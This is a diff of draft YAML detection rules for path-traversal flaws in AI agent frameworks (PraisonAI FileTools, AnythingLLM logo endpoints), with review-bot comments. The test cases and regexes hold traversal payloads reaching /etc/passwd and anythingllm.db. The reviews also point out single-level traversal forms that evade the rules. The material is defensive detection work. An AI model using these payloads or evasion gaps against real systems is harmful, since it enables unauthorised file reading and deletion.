- input: "normalized = os.path.normpath(filepath)\n if '..' in normalized:\n raise ValueError"
|
|
97
|
+
expected: triggered
|
|
98
|
+
description: "The vulnerable normpath-first then dead '..' check logic bug"
|
|
99
|
+
- input: "CVE-2026-35615 exploit: write_file('foo/../../../etc/passwd', payload) bypasses _validate_path"
|
|
100
|
+
expected: triggered
|
|
101
|
+
description: "Explicit CVE framing with FileTools traversal payload"
|
|
102
|
+
true_negatives:
|
|
103
|
+
- input: "FileTools.read_file('/workspace/output/results.json')"
|
|
104
|
+
expected: not_triggered
|
|
105
|
+
description: "Legitimate absolute path with no traversal segment"
|
|
106
|
+
- input: "Upgrade PraisonAI to >= 1.5.113 to remediate CVE-2026-35615."
|
|
107
|
+
expected: not_triggered
|
|
108
|
+
description: "Mitigation advisory text without any traversal payload"
|
|
109
|
+
- input: "We use os.path.normpath() to canonicalize the upload directory before saving."
|
|
110
|
+
expected: not_triggered
|
|
111
|
+
description: "Benign normpath mention with no dead '..' check and no traversal"
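Review bot: The third condition (file line 73, `(?i)[''"/]?(?:tmp[\\/])?\.\.[\\/]+etc[\\/]+passwd`) is broader than its own description: every leading element is optional, so it reduces to a bare `../etc/passwd` and fires on any generic path-traversal text — OWASP examples, WAF test strings, CTF write-ups, or an agent simply being asked about traversal — with no PraisonAI token at all, and with `block_input` in the response actions that is a blocking false positive mis-attributed to CVE-2026-35615 by the message template. Make the `/tmp/` prefix mandatory so the regex matches the advisory PoC it claims to, `value: '(?i)[\\/]tmp[\\/]+\.\.[\\/]+etc[\\/]+passwd'`; the existing true positives still fire through conditions 1 and 4, and a true negative such as `- input: "Classic traversal example: ../../../etc/passwd"` with `expected: not_triggered` should pin the narrowing. Conversely, condition 1 only fires when the traversal ends at one of five listed targets, so a single-level `read_file('/tmp/../home/app/.env')` or a `write_file` to `.ssh/authorized_keys` is missed even though, given the dead `'..'` check the description documents, any `..` segment in a FileTools argument is already anomalous and could be flagged at lower confidence. With condition 3 as written, `wild_fp_rate: 0` is not a supportable claim for a draft rule.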
|
|
@@ -0,0 +1,95 @@
|
|
|
1
|
+
title: "AnythingLLM Logo Endpoint Path Traversal File Read/Delete (CVE-2024-3025)"
|
|
2
|
+
id: ATR-2026-01973
|
|
3
|
+
rule_version: 1
|
|
4
|
+
status: draft
|
|
5
|
+
description: >
|
|
6
|
+
Detects CVE-2024-3025 (CWE-23, CVSS CRITICAL): mintplex-labs/anything-llm
|
|
7
|
+
before 1.0.0 fails to validate the user-supplied logo filename on the
|
|
8
|
+
/api/system/upload-logo and /api/system/logo endpoints. An authenticated
|
|
9
|
+
attacker passes path-traversal sequences (../../../) in the logo filename to
|
|
10
|
+
read or delete arbitrary files outside the assets directory, with the SQLite
|
|
11
|
+
database storage/anythingllm.db as a high-value target. The fix added a
|
|
12
|
+
normalizePath() guard. This rule keys on the specific logo endpoint paths
|
|
13
|
+
combined with ../ traversal (raw or %2e%2e%2f-encoded) into storage/anythingllm.db.
|
|
14
|
+
author: "ATR Community"
|
|
15
|
+
date: "2026/06/29"
|
|
16
|
+
schema_version: "0.1"
|
|
17
|
+
detection_tier: pattern
|
|
18
|
+
maturity: test
|
|
19
|
+
severity: critical
|
|
20
|
+
references:
|
|
21
|
+
owasp_llm: ["LLM06:2025 - Excessive Agency"]
|
|
22
|
+
owasp_agentic: ["ASI06:2026 - Tool Misuse"]
|
|
23
|
+
mitre_atlas: ["AML.T0049 - Exploit Public-Facing Application"]
|
|
24
|
+
mitre_attack: ["T1190 - Exploit Public-Facing Application"]
|
|
25
|
+
cve: ["CVE-2024-3025"]
|
|
26
|
+
metadata_provenance: { mitre_atlas: human-reviewed, owasp_llm: human-reviewed, owasp_agentic: human-reviewed }
|
|
27
|
+
compliance:
|
|
28
|
+
eu_ai_act:
|
|
29
|
+
- article: "15"
|
|
30
|
+
context: "Article 15 (accuracy, robustness, cybersecurity) — runtime detection of this technique is a cybersecurity control for high-risk AI systems. Technique: AnythingLLM Logo Endpoint Path Traversal File Read/Delete (CVE-2024-3025)."
|
|
31
|
+
strength: primary
|
|
32
|
+
- article: "9"
|
|
33
|
+
context: "Article 9 (risk management system) requires identified risks to be addressed by appropriate measures; this rule is a runtime risk-treatment control. Technique: AnythingLLM Logo Endpoint Path Traversal File Read/Delete (CVE-2024-3025)."
|
|
34
|
+
strength: secondary
|
|
35
|
+
nist_ai_rmf:
|
|
36
|
+
- subcategory: "MP.5.1"
|
|
37
|
+
context: "NIST AI RMF MAP 5.1 — likelihood and impact of the identified attack are characterised; this rule detects the adversarial input at runtime. Technique: AnythingLLM Logo Endpoint Path Traversal File Read/Delete (CVE-2024-3025)."
|
|
38
|
+
strength: primary
|
|
39
|
+
- subcategory: "MG.3.2"
|
|
40
|
+
context: "NIST AI RMF MANAGE 3.2 — runtime monitoring/maintenance control that surfaces this attack class. Technique: AnythingLLM Logo Endpoint Path Traversal File Read/Delete (CVE-2024-3025)."
|
|
41
|
+
strength: secondary
|
|
42
|
+
iso_42001:
|
|
43
|
+
- clause: "8.1"
|
|
44
|
+
context: "ISO/IEC 42001 Clause 8.1 (operational planning and control) — detection of this payload is an operational control. Technique: AnythingLLM Logo Endpoint Path Traversal File Read/Delete (CVE-2024-3025)."
|
|
45
|
+
strength: primary
|
|
46
|
+
- clause: "8.3"
|
|
47
|
+
context: "ISO/IEC 42001 Clause 8.3 (AI risk treatment) — this rule implements runtime detection as a treatment control. Technique: AnythingLLM Logo Endpoint Path Traversal File Read/Delete (CVE-2024-3025)."
|
|
48
|
+
strength: secondary
|
|
49
|
+
tags: { category: tool-poisoning, subcategory: path-traversal, scan_target: both, confidence: high, source: cve-disclosure, vendor_sources: anythingllm-cve-2024-3025 }
|
|
50
|
+
agent_source: { type: llm_io, framework: [any], provider: [any] }
|
|
51
|
+
detection:
|
|
52
|
+
condition: any
|
|
53
|
+
false_positives:
|
|
54
|
+
- "Legitimate logo upload/fetch hitting /api/system/upload-logo or /api/system/logo with a normal filename like my-logo.png and no ../ sequence."
|
|
55
|
+
- "Documentation or changelog mentioning the logo endpoints without a traversal payload."
|
|
56
|
+
conditions:
|
|
57
|
+
- field: content
|
|
58
|
+
operator: regex
|
|
59
|
+
value: '(?i)/api/system/(?:upload-)?logo[\s\S]{0,200}(?:\.\./|\.\.%2f|%2e%2e%2f|%2e%2e/){2,}[\s\S]{0,120}(?:storage[/\\])?anythingllm\.db'
|
|
60
|
+
description: "AnythingLLM logo endpoint hit with multi-level ../ traversal (raw or URL-encoded) reaching storage/anythingllm.db"
|
|
61
|
+
- field: content
|
|
62
|
+
operator: regex
|
|
63
|
+
value: '(?i)/api/system/(?:upload-)?logo[\s\S]{0,200}(?:filename|logo)=[\s\S]{0,40}(?:\.\./|%2e%2e%2f|\.\.%2f){2,}'
|
|
64
|
+
description: "Logo filename/logo query param carrying multi-level path-traversal sequences on the logo endpoint"
|
|
65
|
+
- field: content
|
|
66
|
+
operator: regex
|
|
67
|
+
value: '(?i)CVE-2024-3025[\s\S]{0,200}(?:path\s*traversal|logo|anythingllm\.db|/api/system/(?:upload-)?logo)'
|
|
68
|
+
description: "explicit CVE framing"
|
|
69
|
+
response:
|
|
70
|
+
actions: [alert, block_input]
|
|
71
|
+
message_template: >
|
|
72
|
+
[ATR-2026-01973] CRITICAL: AnythingLLM logo endpoint path traversal (CVE-2024-3025) reads/deletes arbitrary files such as storage/anythingllm.db. Block and patch.
|
|
73
|
+
confidence: 80
|
|
74
|
+
wild_fp_rate: 0
|
|
75
|
+
test_cases:
|
|
76
|
+
true_positives:
|
|
77
|
+
- input: "GET /api/system/logo?filename=../../../storage/anythingllm.db HTTP/1.1"
|
|
78
|
+
expected: triggered
|
|
79
|
+
description: "Logo fetch endpoint with ../ traversal to the SQLite database file"
|
|
80
|
+
- input: "POST /api/system/upload-logo with logo=../../../../storage/anythingllm.db to delete the database"
|
|
81
|
+
expected: triggered
|
|
82
|
+
description: "Upload-logo endpoint abused with traversal into storage/anythingllm.db"
|
|
83
|
+
- input: "Exploiting CVE-2024-3025: /api/system/logo path traversal to read anythingllm.db"
|
|
84
|
+
expected: triggered
|
|
85
|
+
description: "Explicit CVE-2024-3025 framing with the logo endpoint and traversal target"
|
|
86
|
+
true_negatives:
|
|
87
|
+
- input: "GET /api/system/logo?theme=default HTTP/1.1 returns the configured workspace logo"
|
|
88
|
+
expected: not_triggered
|
|
89
|
+
description: "Normal logo fetch with theme param, no traversal sequence"
|
|
90
|
+
- input: "POST /api/system/upload-logo uploading company-logo.png as the new appearance logo"
|
|
91
|
+
expected: not_triggered
|
|
92
|
+
description: "Legitimate logo upload with a clean filename"
|
|
93
|
+
- input: "The /api/system/logo endpoint serves the branding image configured in Appearance settings."
|
|
94
|
+
expected: not_triggered
|
|
95
|
+
description: "Generic mention of the endpoint with no exploit token or traversal"
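Review bot: Both traversal regexes (file lines 59 and 63) use `{2,}`, so they require at least two consecutive `../` segments and miss a single-level escape; if the logo assets directory sits directly under `storage/` (which the `storage/anythingllm.db` target named in the description suggests, though the layout is not shown here), `GET /api/system/logo?filename=../anythingllm.db` reaches the database and triggers neither condition, nor the CVE-framing one. Changing `{2,}` to `+` in both patterns keeps precision, because condition 1 is still anchored on the endpoint plus the `anythingllm.db` target and condition 2 on the endpoint plus a `filename=`/`logo=` parameter, and none of the listed true negatives contain a `../` at all. Add a true positive pinning it: `- input: "GET /api/system/logo?filename=../anythingllm.db HTTP/1.1"` with `expected: triggered`. Neither pattern accepts a backslash (`..\`) or double-encoded `%252e%252e%252f` form; whether the vulnerable path handling honours those is not established by this rule, so treat that as a follow-up rather than a defect.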
|